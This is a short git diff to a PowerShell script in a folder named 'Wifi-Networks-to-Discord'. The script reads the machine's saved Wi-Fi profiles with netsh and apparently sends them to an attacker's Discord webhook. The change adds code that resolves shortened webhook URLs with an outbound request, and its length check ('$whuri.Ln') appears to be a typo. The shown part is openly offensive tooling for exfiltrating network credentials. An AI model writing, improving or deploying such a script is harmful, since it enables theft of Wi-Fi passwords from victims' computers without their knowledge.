diff --git a/Wifi-Networks-to-Discord/main.ps1 b/Wifi-Networks-to-Discord/main.ps1 index ce821d5..215e554 100644 --- a/Wifi-Networks-to-Discord/main.ps1 +++ b/Wifi-Networks-to-Discord/main.ps1 @@ -1,4 +1,7 @@ $whuri = "$dc" +# shortened URL Detection +if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} + $outfile="" $a=0 $ws=(netsh wlan show profiles) -replace ".*:\s+"